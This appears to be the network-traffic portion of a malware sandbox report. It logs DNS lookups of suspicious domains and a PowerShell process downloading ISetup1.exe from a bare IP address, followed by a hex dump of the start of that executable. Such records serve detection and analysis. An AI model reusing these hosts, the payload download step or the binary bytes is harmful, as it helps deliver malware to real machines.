Apr 26, 2024 17:11:13.359477043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.359493971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.359509945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.359510899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.359538078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.359538078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.359580040 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.361804962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.361843109 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.361871004 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.361877918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.361893892 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.361937046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362055063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362092018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362112045 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362127066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362138987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362163067 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362174988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362199068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362235069 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362247944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362282991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362494946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362534046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362584114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362588882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362634897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362854958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.362936020 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.362977028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363013983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363030910 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363090038 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363292933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363331079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363354921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363368034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363375902 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363404036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363415956 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363456011 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363473892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363512039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363526106 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363605022 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363641024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363676071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.363746881 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.363985062 CEST	80	49713	176.97.76.106	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 17:10:53.165883064 CEST	192.168.2.5	1.1.1.1	0x3a38	Standard query (0)	d68kcn56pzfb4.cloudfront.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:03.050688982 CEST	192.168.2.5	1.1.1.1	0x966	Standard query (0)	240216234727901.mjj.xne26.cfd	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:07.480503082 CEST	192.168.2.5	1.1.1.1	0x75f5	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:14.516571045 CEST	192.168.2.5	1.1.1.1	0x7034	Standard query (0)	monoblocked.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:16.910304070 CEST	192.168.2.5	1.1.1.1	0xcc51	Standard query (0)	c.574859385.xyz	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:31.116318941 CEST	192.168.2.5	1.1.1.1	0x8ec3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:31.116832972 CEST	192.168.2.5	1.1.1.1	0xda71	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 17:11:32.638245106 CEST	192.168.2.5	1.1.1.1	0xe0d5	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:40.474781036 CEST	192.168.2.5	1.1.1.1	0x88f9	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:14.714498043 CEST	192.168.2.5	1.1.1.1	0x1066	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:30.251343966 CEST	192.168.2.5	1.1.1.1	0x2237	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:31.323791027 CEST	192.168.2.5	1.1.1.1	0x9b79	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:31.825253010 CEST	192.168.2.5	1.1.1.1	0x840c	Standard query (0)	service-domain.xyz	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:32.262746096 CEST	192.168.2.5	1.1.1.1	0x1055	Standard query (0)	skrptfiles.tracemonitors.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:33.933084965 CEST	192.168.2.5	1.1.1.1	0x54ae	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:41.386744976 CEST	192.168.2.5	1.1.1.1	0xe5b	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:41.859821081 CEST	192.168.2.5	1.1.1.1	0x43e2	Standard query (0)	api4.check-data.xyz	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:42.522061110 CEST	192.168.2.5	1.1.1.1	0x71ad	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:44.613079071 CEST	192.168.2.5	1.1.1.1	0x71ad	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.471290112 CEST	192.168.2.5	1.1.1.1	0xf057	Standard query (0)	skrptfiles.tracemonitors.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.703263998 CEST	192.168.2.5	1.1.1.1	0xf4bc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.704727888 CEST	192.168.2.5	1.1.1.1	0xd753	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 17:12:59.176489115 CEST	192.168.2.5	1.1.1.1	0x2a8b	Standard query (0)	api.check-data.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 17:10:53.296396971 CEST	1.1.1.1	192.168.2.5	0x3a38	No error (0)	d68kcn56pzfb4.cloudfront.net		108.157.172.96	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:10:53.296396971 CEST	1.1.1.1	192.168.2.5	0x3a38	No error (0)	d68kcn56pzfb4.cloudfront.net		108.157.172.53	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:10:53.296396971 CEST	1.1.1.1	192.168.2.5	0x3a38	No error (0)	d68kcn56pzfb4.cloudfront.net		108.157.172.77	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:10:53.296396971 CEST	1.1.1.1	192.168.2.5	0x3a38	No error (0)	d68kcn56pzfb4.cloudfront.net		108.157.172.72	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:03.439498901 CEST	1.1.1.1	192.168.2.5	0x966	Server failure (2)	240216234727901.mjj.xne26.cfd	none	none	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:07.607424974 CEST	1.1.1.1	192.168.2.5	0x75f5	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:12.470979929 CEST	1.1.1.1	192.168.2.5	0xf667	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:11:12.470979929 CEST	1.1.1.1	192.168.2.5	0xf667	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:13.414943933 CEST	1.1.1.1	192.168.2.5	0x2b18	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:13.414943933 CEST	1.1.1.1	192.168.2.5	0x2b18	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:14.804461002 CEST	1.1.1.1	192.168.2.5	0x7034	No error (0)	monoblocked.com		45.130.41.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:17.342437983 CEST	1.1.1.1	192.168.2.5	0xcc51	No error (0)	c.574859385.xyz		37.221.125.202	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:31.242470026 CEST	1.1.1.1	192.168.2.5	0x8ec3	No error (0)	www.google.com		192.178.50.36	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:31.243076086 CEST	1.1.1.1	192.168.2.5	0xda71	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 17:11:32.782272100 CEST	1.1.1.1	192.168.2.5	0xe0d5	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:11:40.602067947 CEST	1.1.1.1	192.168.2.5	0x88f9	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:11:40.602067947 CEST	1.1.1.1	192.168.2.5	0x88f9	No error (0)	iolo0.b-cdn.net		156.146.43.65	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:14.517677069 CEST	1.1.1.1	192.168.2.5	0x64b4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:14.517677069 CEST	1.1.1.1	192.168.2.5	0x64b4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:14.845891953 CEST	1.1.1.1	192.168.2.5	0x1066	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:14.845891953 CEST	1.1.1.1	192.168.2.5	0x1066	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:14.845891953 CEST	1.1.1.1	192.168.2.5	0x1066	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:30.378844023 CEST	1.1.1.1	192.168.2.5	0x2237	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:30.378844023 CEST	1.1.1.1	192.168.2.5	0x2237	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:30.378844023 CEST	1.1.1.1	192.168.2.5	0x2237	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:31.624774933 CEST	1.1.1.1	192.168.2.5	0x9b79	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:31.984695911 CEST	1.1.1.1	192.168.2.5	0x840c	No error (0)	service-domain.xyz		3.80.150.121	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:32.393224001 CEST	1.1.1.1	192.168.2.5	0x1055	No error (0)	skrptfiles.tracemonitors.com	d1u0l9f6kr1di3.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:32.393224001 CEST	1.1.1.1	192.168.2.5	0x1055	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.38	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:32.393224001 CEST	1.1.1.1	192.168.2.5	0x1055	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.64	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:32.393224001 CEST	1.1.1.1	192.168.2.5	0x1055	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.18	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:32.393224001 CEST	1.1.1.1	192.168.2.5	0x1055	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.24	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:34.071897984 CEST	1.1.1.1	192.168.2.5	0x54ae	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:34.071897984 CEST	1.1.1.1	192.168.2.5	0x54ae	No error (0)	googlehosted.l.googleusercontent.com		142.250.64.193	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:41.779423952 CEST	1.1.1.1	192.168.2.5	0xe5b	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:41.779423952 CEST	1.1.1.1	192.168.2.5	0xe5b	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:41.779423952 CEST	1.1.1.1	192.168.2.5	0xe5b	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:42.007356882 CEST	1.1.1.1	192.168.2.5	0x43e2	No error (0)	api4.check-data.xyz	checkdata-1114476139.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:42.007356882 CEST	1.1.1.1	192.168.2.5	0x43e2	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.239.127.146	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:42.007356882 CEST	1.1.1.1	192.168.2.5	0x43e2	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.239.141.158	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:43.129904985 CEST	1.1.1.1	192.168.2.5	0x71ad	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:44.740008116 CEST	1.1.1.1	192.168.2.5	0x71ad	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.600899935 CEST	1.1.1.1	192.168.2.5	0xf057	No error (0)	skrptfiles.tracemonitors.com	d1u0l9f6kr1di3.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:45.600899935 CEST	1.1.1.1	192.168.2.5	0xf057	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.24	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.600899935 CEST	1.1.1.1	192.168.2.5	0xf057	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.18	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.600899935 CEST	1.1.1.1	192.168.2.5	0xf057	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.38	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.600899935 CEST	1.1.1.1	192.168.2.5	0xf057	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.87.64	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.838226080 CEST	1.1.1.1	192.168.2.5	0xf4bc	No error (0)	www.google.com		142.250.189.132	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:45.838238955 CEST	1.1.1.1	192.168.2.5	0xd753	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 17:12:59.319411993 CEST	1.1.1.1	192.168.2.5	0x2a8b	No error (0)	api.check-data.xyz	checkdata-1114476139.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 17:12:59.319411993 CEST	1.1.1.1	192.168.2.5	0x2a8b	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.239.127.146	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:12:59.319411993 CEST	1.1.1.1	192.168.2.5	0x2a8b	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.239.141.158	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	185.172.128.59	80	5268	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:10:59.563261986 CEST	75	OUT	GET /ISetup1.exe HTTP/1.1 Host: 185.172.128.59 Connection: Keep-Alive
Apr 26, 2024 17:10:59.804166079 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:10:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 15:00:01 GMT ETag: "6e801-61701287ad007" Accept-Ranges: bytes Content-Length: 452609 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 3c 9d 55 32 5d f3 06 32 5d f3 06 32 5d f3 06 3f 0f 2c 06 2e 5d f3 06 3f 0f 13 06 4c 5d f3 06 3f 0f 12 06 1c 5d f3 06 3b 25 60 06 31 5d f3 06 32 5d f2 06 5e 5d f3 06 87 c3 16 06 33 5d f3 06 3f 0f 28 06 33 5d f3 06 87 c3 2d 06 33 5d f3 06 52 69 63 68 32 5d f3 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9c 50 29 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 00 01 00 00 be c4 03 00 00 00 00 47 43 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 c5 03 00 04 00 00 fd 8d 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 01 00 28 00 00 00 00 50 c4 03 0d 6d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c5 03 64 13 00 00 f0 11 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 68 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 ff 00 00 00 10 00 00 00 00 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 32 6c 00 00 00 10 01 00 00 6e 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 cd c2 03 00 80 01 00 00 f4 03 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 0d 6d 01 00 00 50 c4 03 00 6e 01 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 13 00 00 00 c0 c5 03 00 14 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$v<U2]2]2]?,.]?L]?];%`1]2]^]3]?(3]-3]Rich2]PELP)dGC@s(Pmd8h@\|.text `.rdata2ln@@.datar@.rsrcmPnf@@.relocd@B
Apr 26, 2024 17:10:59.804207087 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 ec 3c 04 04 e8 75 02 00 00 68 fb 0e 41 00 e8 3f 2d 00 00 59 c3 b9 f4 3c 04 04 e8 c8 02 00 00 68 f1 0e 41 00 e8 29 Data Ascii: <uhA?-Y<hA)-Y<hA-Yj<j<j<j<UQQL$$X]E]UQQQQ$$]EYY]U
Apr 26, 2024 17:10:59.804250956 CEST	1289	IN	Data Raw: f8 03 45 d8 33 c1 89 4d fc 8b 0d d0 3c 04 04 c7 05 c8 3c 04 04 ee 3d ea f4 89 45 f8 81 f9 13 02 00 00 75 69 53 53 53 ff 15 70 10 41 00 53 53 53 53 53 53 ff 15 48 10 41 00 53 53 ff 15 2c 10 41 00 8d 45 c8 50 ff 15 0c 10 41 00 53 53 53 ff 15 28 10 Data Ascii: E3M<<=EuiSSSpASSSSSSHASS,AEPASSS(APSASSAEPSEPS<ASSSSPAE<+}uSAEEE]EEEEEEMEEEEMU3E3U:UGaU
Apr 26, 2024 17:10:59.804291010 CEST	1289	IN	Data Raw: 0c 2c e9 27 81 6c 24 08 c0 09 e3 12 b8 b9 73 87 5a f7 64 24 24 8b 44 24 24 81 6c 24 20 c1 62 43 20 81 6c 24 08 08 30 ca 11 b8 97 8c fa 72 f7 64 24 0c 8b 44 24 0c b8 80 b4 ab 2f f7 64 24 14 8b 44 24 14 b8 1e 18 24 33 f7 64 24 10 8b 44 24 10 b8 f1 Data Ascii: ,'l$sZd$$D$$l$ bC l$0rd$D$/d$D$$3d$D$ d$D$D$3gD$Nd$D$l$ \|yHl$Nl$}7d$D$l$Iip0yd$D$oS@d$D$D$axl$#MD$$fvD$4R5U+d$D$l$u
Apr 26, 2024 17:10:59.804336071 CEST	1289	IN	Data Raw: 51 ff 31 8b 4d 08 e8 5c 02 00 00 8b 45 08 5d c2 04 00 e9 ed 01 00 00 56 51 8b f1 e8 22 02 00 00 8b c6 5e c2 04 00 ff 31 e8 2a 02 00 00 c3 55 8b ec 56 57 8b 7d 08 8b f1 57 e8 5a 01 00 00 8b ce 84 c0 74 15 ff 75 0c e8 a6 01 00 00 2b f8 8b ce 57 56 Data Ascii: Q1M\E]VQ"^1*UVW}WZtu+WVq.jutuWPu_^]UEV9FrPh^]&USVW}^;rCM+;wW%t(U++QQPaS
Apr 26, 2024 17:10:59.804440022 CEST	1289	IN	Data Raw: 00 8b 55 08 8b ce 50 e8 d1 00 00 00 5e 5d c2 08 00 8b c1 c3 8b c1 c3 8b c1 c3 55 8b ec 8b 4d 0c e8 d8 00 00 00 8b 55 08 50 e8 d2 00 00 00 5d c2 08 00 33 c0 85 c9 74 15 83 f9 ff 77 0b 51 e8 ba 1e 00 00 59 85 c0 75 05 e9 cb 02 00 00 c3 6a 0c e8 a8 Data Ascii: UP^]UMUP]3twQYujYVW~%+rG_F^hhAUUUUVuueMPJPG^]UVWMPV
Apr 26, 2024 17:10:59.804480076 CEST	1289	IN	Data Raw: 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76 fc 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 04 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 04 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 04 66 Data Ascii: 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf@ur$@r$)@$@$l*@)@(
Apr 26, 2024 17:10:59.804519892 CEST	1289	IN	Data Raw: c0 75 14 e8 42 22 00 00 c7 00 16 00 00 00 e8 c8 21 00 00 33 c0 5d c3 8b 40 0c 83 e0 10 5d c3 55 8b ec 8b 45 08 56 8b f1 83 66 04 00 c7 06 34 20 41 00 c6 46 08 00 ff 30 e8 a8 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 08 c7 01 34 20 41 00 8b 00 Data Ascii: uB"!3]@]UEVf4 AF0^]UE4 AAA]UVuf4 AF^]4 AUVW};ttw5GF_^]UV4 AREtVxY^]U}St-W
Apr 26, 2024 17:10:59.804558992 CEST	1289	IN	Data Raw: 8d e4 33 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 38 33 40 00 ff 24 8d 34 34 40 00 90 48 33 40 00 6c 33 40 00 94 33 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 34 Data Ascii: 3@Ir+$83@$44@H3@l3@3@F#Gr$44@IF#GFGr$44@F#GFGFGV$44@I3@3@3@4@4@4@4@+4@DDDDDDDD
Apr 26, 2024 17:10:59.805694103 CEST	1289	IN	Data Raw: 41 00 85 47 70 75 07 e8 cd 24 00 00 89 06 8b 46 04 5f 3b 05 b4 85 41 00 74 15 8b 4e 08 a1 e0 88 41 00 85 41 70 75 08 e8 2f 28 00 00 89 46 04 8b 4e 08 8b 41 70 a8 02 75 16 83 c8 02 89 41 70 c6 46 0c 01 eb 0a 8b 01 89 06 8b 41 04 89 46 04 8b c6 5e Data Ascii: AGpu$F_;AtNAApu/(FNApuApFAF^]UVW}?t~utwuMNEPP,YEYt*xt~<;pt\|7jjptWjpHAt Eptjj3FVWjpHAu}tMap3_^]
